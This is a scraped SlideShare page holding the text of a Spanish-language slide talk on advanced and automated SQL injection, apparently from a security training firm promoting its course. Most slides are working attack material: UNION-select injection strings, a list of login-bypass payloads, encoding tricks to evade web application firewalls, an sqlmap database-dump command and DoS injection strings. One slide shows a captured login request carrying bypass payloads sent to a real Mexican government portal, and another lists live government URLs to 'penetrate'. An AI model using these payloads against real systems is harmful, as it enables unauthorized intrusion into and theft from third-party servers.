O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.
Inyecciones SQL Avanzadas y              automatizadas.               www.n3xasec.comPentester Rafael Gómez Del ÁngelDirec...
TEMAS QUE VEREMOS EN LA PONENCIA1.- Identificación de la vulnerabilidad2.-Estructuración básica de una inyección3.-Blindan...
¿Que es una inyección SQL ?           Inyectar                                                         Inyectar           ...
Mas vulnerabilidades de inyección !!XSS                   RFI      LDAP          Command Injection             LFI
Estructura básica de una inyección  Una inyección esta compuesta básicamente 3 partes:  1.-La sintaxis en lenguaje SQL, un...
Video de inyección e identificación Básica !!
Blindando las inyecciones SQL !  Urlencode                                        Base 64 encode                          ...
Host=portal2.edomex.gob.mxUser-Agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101Firefox/19.0Accept=tex...
POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password=%27or1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg%3FIdcServ...
LOGGIN BY PASS!!Para pasarnos un loggin Se utiliza la sentencia OR yaque esta significa que si algo es verdadero entoncest...
LOGGIN BY PASS!!                     admin’ - -                     admin’ #                     admin ‘ /*               ...
Penetrar un servidor en VIVOhttp://salud.edomexico.gob.mx/html/index.phphttp://ddsisem.dyndns.org/activo_fijo/login.php
WAFWAF   Web Application Firewall      Web Application Firewall
Como funciona el WAF ?
Detectando WAFDetectando WAF
Char Encode             Útil para evadir detección de palabrasEl atacante sabe que existen filtros que evitara la llegada ...
Char-doble encodeCifra en Hexadecimal, útil cuando la aplicación emplea Url encode
Char-Unicode Encode    Cifrando con el estándar            Unicode
Automatización de inyección    Automatización de inyecciónHAVIJ                       SQLMAP
Video automatización de inyección y TampersVideo automatización de inyección y Tampers
Dumpleando la BD          Dumpleando la BD./sqlmap.py -u www.xxx.sp.php?id=666 --dump -all                  VIDEO
Ataques DOS por inyección SQL    Este ataque se genera cuando mandamos una consulta    MAL formada, de tal manera que cuan...
Penetración a sistemas de gobierno    Es el sector mas atacado por hacktivistas
GRACIAS!!! ¿ Dudas ?INSCRIPCIONESABIERTAS                 Diplomado para SIOHE Seguridad Informática                      ...
Ponencia sql avanzado y automatizado
Ponencia sql avanzado y automatizado
Ponencia sql avanzado y automatizado
Próximos SlideShares
Carregando em…5
×

Ponencia sql avanzado y automatizado

1.923 visualizações

Publicada em

  • Seja o primeiro a comentar

Ponencia sql avanzado y automatizado

  1. 1. Inyecciones SQL Avanzadas y automatizadas. www.n3xasec.comPentester Rafael Gómez Del ÁngelDirector de N3XAsecDocente de la certificación:SIOHE Seguridad Informática Ofensiva Hacking Etico
  2. 2. TEMAS QUE VEREMOS EN LA PONENCIA1.- Identificación de la vulnerabilidad2.-Estructuración básica de una inyección3.-Blindando las inyecciones4.-Automatizando las inyecciones5.-Evadiendo Firewall Web6.-Loggin Bypass7.-Dumpeando la base de datos8.-Vulnerando servidores de GOBIERNO9.-Ataques DOS SQLI
  3. 3. ¿Que es una inyección SQL ? Inyectar Inyectar AQUI !! AQUI !! www.victima.com/index.php?idVulnerable=34 GETPOST
  4. 4. Mas vulnerabilidades de inyección !!XSS RFI LDAP Command Injection LFI
  5. 5. Estructura básica de una inyección Una inyección esta compuesta básicamente 3 partes: 1.-La sintaxis en lenguaje SQL, union+all+select, 2.-Busqueda de numero de tablas 1,2,3,4,5,6,7.... (NULL,NULL,NULL) 3.- El comando a ejecutar o los datos a obtener @@version id_vulnerable=73+UNION+ALL+SELECT 1,2,3 */* id_vulnerable=73+UNION+ALL+SELECT 1,2,@@version*/*id_vulnerable=73 LIMIT 1,1 UNION ALL SELECT NULL, NULL,CONCAT(0x3a626e653a,0x4f536a56435074746677,0x3a626c713a), NULL, NULL,NULL, NULL#
  6. 6. Video de inyección e identificación Básica !!
  7. 7. Blindando las inyecciones SQL ! Urlencode Base 64 encode L2V0Yy9wYXNzd2Qv== /etc/passwd/ Hexencode 2f2a2a2f6574632f7061737377642f2a2a2f /**/**/etc/passwd/**/**/ /**/**/etc/**/**/passwd/**/**/ http://www.string-functions.com/
  8. 8. Host=portal2.edomex.gob.mxUser-Agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101Firefox/19.0Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language=es-MX,es-ES;q=0.8,es-AR;q=0.7,es;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding=gzip, deflateReferer=http://portal2.edomex.gob.mx/idcprod/idcplg?IdcService=LOGIN&Action=GetTemplatePage&Page=HOME_PAGE&Auth=InternetCookie=__utma=26329020.1898314859.1361471024.1361478811.1362458074.3; __utmz=26329020.1361478811.2.2.utmcsr=busquedas.edomex.gob.mx|utmccn=(referral)|utmcmd=referral|utmcct=/search/query/browse.jsp;HstCfa704590=1362458074082; HstCla704590=1362458074082;HstCmu704590=1362458074082; HstPn704590=1; HstPt704590=1;HstCnv704590=1; HstCns704590=1;BIGipServerpool_ContentManager_80=3355970058.20480.0000;BIGipServerpool_PortalWebcacheNuevo_7777=1762265610.24862.0000Content-Length=199POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password=%27or1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg%3FIdcService%3DLOGIN%26Action%3DGetTemplatePage%26Page%3DHOME_PAGE%26Auth%3DInternet&edit=Login
  9. 9. POSTDATA=username=%27or1%3D1+or+%27%27%3D%27&password=%27or1%3D1+or+%27%27%3D%27&redirecturl=%2Fidcprod%2Fidcplg%3FIdcService%3DLOGIN%26Action%3DGetTemplatePage%26Page%3DHOME_PAGE%26Auth%3DInternet&edit=Login
  10. 10. LOGGIN BY PASS!!Para pasarnos un loggin Se utiliza la sentencia OR yaque esta significa que si algo es verdadero entoncestodo será verdadero OR 1=1 . Esto provocará queautomáticamente toda la consulta sea verdadera, seacual sea el usuario.1.- V or V = VERDADERO-------------------- ‘’OR 1=1 /* ‘2.- V or F = VERDADERO-------------------- “OR 1=0 /* ‘3.- F or V = VERDADERO-------------------- “OR 0=1 /* ‘4.- F or F = FALSO----------------------------- “OR 0=0 /* ’
  11. 11. LOGGIN BY PASS!! admin’ - - admin’ # admin ‘ /* ‘ or 1=1- - ‘ or 1=1# ‘ or 1=0/* ‘) or 1=0 ‘1’=‘1- - ‘) or 1=1 (‘1’=‘1 - - ‘) */ 1=0 #
  12. 12. Penetrar un servidor en VIVOhttp://salud.edomexico.gob.mx/html/index.phphttp://ddsisem.dyndns.org/activo_fijo/login.php
  13. 13. WAFWAF Web Application Firewall Web Application Firewall
  14. 14. Como funciona el WAF ?
  15. 15. Detectando WAFDetectando WAF
  16. 16. Char Encode Útil para evadir detección de palabrasEl atacante sabe que existen filtros que evitara la llegada de lainyección al servidor, el usara una combinación de caracteres yencriptaciones para saltarse los filtros y el IDS lo reconozca comovalidos.
  17. 17. Char-doble encodeCifra en Hexadecimal, útil cuando la aplicación emplea Url encode
  18. 18. Char-Unicode Encode Cifrando con el estándar Unicode
  19. 19. Automatización de inyección Automatización de inyecciónHAVIJ SQLMAP
  20. 20. Video automatización de inyección y TampersVideo automatización de inyección y Tampers
  21. 21. Dumpleando la BD Dumpleando la BD./sqlmap.py -u www.xxx.sp.php?id=666 --dump -all VIDEO
  22. 22. Ataques DOS por inyección SQL Este ataque se genera cuando mandamos una consulta MAL formada, de tal manera que cuando el servidor la interprete cause un conflicto interno o “Se confunda” Id?=66+Union,concat(0x3,slep(10000000),0x3) */#-- )OR#1=2-- #Select+from,-- (#)-- OR +FROM--
  23. 23. Penetración a sistemas de gobierno Es el sector mas atacado por hacktivistas
  24. 24. GRACIAS!!! ¿ Dudas ?INSCRIPCIONESABIERTAS Diplomado para SIOHE Seguridad Informática Ofensiva Hacking EticoINICIO 15 DE MAYO2013Plan de financiamiento Informes : info@n3xasec.com Descarga de material y diapositivas www.n3xasec.com

×